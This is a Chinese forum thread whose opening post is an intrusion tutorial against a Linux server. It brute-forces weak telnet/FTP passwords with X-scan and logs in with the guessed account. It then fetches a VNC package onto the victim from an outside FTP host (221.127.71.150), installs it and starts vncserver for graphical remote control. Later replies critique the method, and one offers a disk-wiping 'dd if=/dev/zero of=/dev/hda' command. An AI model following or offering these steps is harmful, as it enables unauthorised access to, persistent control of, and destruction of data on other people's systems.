Windows 类似3389远程控制linux

cdwsxm

当今的中国可以说是个菜鸟济济，基本上windows出一个漏洞，这些菜鸟就会拿些工具批量的入侵更多的国内的windows系统；可是当他们遇见linux系统时就傻眼了，别说菜鸟傻呀，就是平时入侵动网动易系统的那些菜鸟眼里的高手遇见linux也是退避三舍，其实linux并没有那么可怕的，如果你真正研究进去，一些漏洞不见得比windows少的，目前大家常说linux系统比windows系统安全，这也是原因之一；因为国内的那些IT爱好者，菜鸟们都是太专注与盖茨的windwos系统了。
好了，话到此打住，今天我来演示寻找linux主机并界面话控制这个linux主机。
前提：
目标系统rad hat 9
自己操作系统windows 2003 server
自己的windows机器已经安装VNC控制端
X-scan下载地址
http://www.77169.org/Soft/Class2/Class9/200507/20220.html
我们今天用X-scan扫描（扫描动化以及软件

www.77169.org

里面找）我们在这里只是用内网主机来重演一次入侵过程，我们的目标机器(192.168.1.112)通过扫描我们可以得到目标机器的telnet或者Ftp弱口令，可想而之这是一台还没有配置过或者说就是服务器权限还没配置到位的linux,大家看我的扫描结果，如下图
当然你们想扫描linux的弱口令，我就要有一个强大的用户字典与密码字典，比如我们在x-scan中添加测试的用户名密码，我们在我们的猜解帐号字典ftp_user.dic 里面得添加root，以及rootl等几个帐号的，加密码即在 ftp_pass.dic 添加。当然你可以去网上下载 破解字典，一个强大的密码字典，对破解帐号帮助非常大。这里扫描出 用户名 root1 密码 123456  因为是做教程所以密码很简单，实际入侵中破解密码是需要很长时间的。
参照上图我们用这个帐号密码登陆改机器
上面，我们测试telnet登陆成功。因为目标系统开放着FTP服务，现在我们通过 用户名 root1 密码 123456  用FTP来连接这台linux系统，看下图已经进来了，从下面这个图我们就看到了现在我们通过ftp给它下载个vnc的rpm的安装程序过去，我们在命令行下输入ftp 221.127.71.150 这是我存放vnc的rpm安装程序的地址，根据提示输入这个ftp的用户名以及密码public，连接上后输入get vnc-3.3.6-2.i386.rpm 命令格式 get 文件名>;

稍微知道点linux的知道rpm包的是直接安装的软件，我们如果远程连接该怎么办呢？？？我还是教大家shell下安装吧。然后在下面使用ls命令查看自己的VNC的RPM包的具体版本，并且用rpm –ivh vnc-3.3.6-2.i386.rpm (这个vnc-3.3.6-2.i386.rpm为你所下载的rpm安装包全程)，如下图，
好了，到这里我们的linux的被控端已经安装完成了，接下来我们开始启动我们安装的程序吧！
我们在终端里面输入vncserver来启动被控端的vnc服务吧，
Verify: ---1次启动VNC server时，会要求设置网络遥控的密码。
New ‘X’ desktop is linux:1 ----一定要记住这一行稍后会用到。
Creating default startup script /root/.VNC/xstartup
Starting applications specified in /root/.VNC/xstartup
Log file is /root/.VNC/linux:1.log
     经上述步骤后，便已启动了VNC Server。启动服务之后，软件会要求我们设置连接密码的，因为头一次连接会要求输入设置远程控制的密码，当我们需要修改密码时只需要输入vncpasswd即可！
我们在windows 中安装vnc 控制端。下载地址为：
http://www.77169.com
一路回车就可以安装成功，现在运行我们Windows上运行VNC的控制端 直接运行“VNC Viewer”,系统会出现“连接“对话框。 在“连接”对话框中的“地址”文本框中输入VNC 被控端的IP地址（或主机名及显示装置编号，请看在Linux上  启动VNC server的这一行，New ‘X’ desktop is linux:1 得到此信息），例如：192.168.0.1：1（冒号后面的1是执行VNC Server生成的  显示装置编号），单击“OK”按钮后，VNC控制端即会开始检查所输入的信息，若是信息错误，系统会出现“无法连接到主机，超时 ”的错误信息。
好了我现在连接我的linux服务器，提示我输入连接密码，这个密码刚才设置了直接输入即可，现在我们就可以在本地的windows控制我们的linux机器了，如下图
大家一直以来控制linux 都是命令行下控制。现在我们可以用图形界面控制linux 相信对新手来说会有很大的帮助。控制linux就非常的方便，直观！
    好了，这篇文章也就到这里了，我是都市猎人，
[url=msn:cdwsxm@126.com]
MSN:cdwsxm@126.com

bingosek

还不如dd if=/dev/zero of=/dev/hda省事

万里北国

可想而之这是一台还没有配置过或者说就是服务器权限还没配置到位的linux,

汗。。。。。。。。

txkss

安全是一种意识

platinum

扫描出 FTP 的弱密码，怎么就成了系统密码？！

bingosek

人家接着又用缓冲区溢出取得root权限吧?

phpman

浩浩,windows真强,但是....
为什么贴到这个地方,
如果是我做的话,telnet更本就不开,开也不会允许root远程登录,我用 ssh的2048 bits 的RSA key验证. 难道你还能猜出我的key ?

这种话题,root密码知道了还叫入侵?攻击?

再说了，x-window难道比不上VNC么?

bingosek

猜测密码就算你是ssh也没有用的,如果你没有指定只能是某些计算及才能用shh登入

相当一部分的入侵都是采用猜测弱口令.就算是黑客高手,如果能猜测出口令也不会用更高深的技术去入侵的,毕竟猜测口令比较省事

phpman

RSA的KEY据说也有人猜的,哈哈

phpman

对于有些人来说，Linux确实不如windows.  
存在既为合理，既然windows和Linux 都存在于现实,
那么,各取所需就可以了.
不过windows的大牛门最近好象要头疼了,狙击波据来了的说.
前天还在这个坛子上看到一大牛玩6年linux没碰到过病毒.这次看来也是没有Linux的份了.
BTW,Linux下编写病毒传说其实很简单.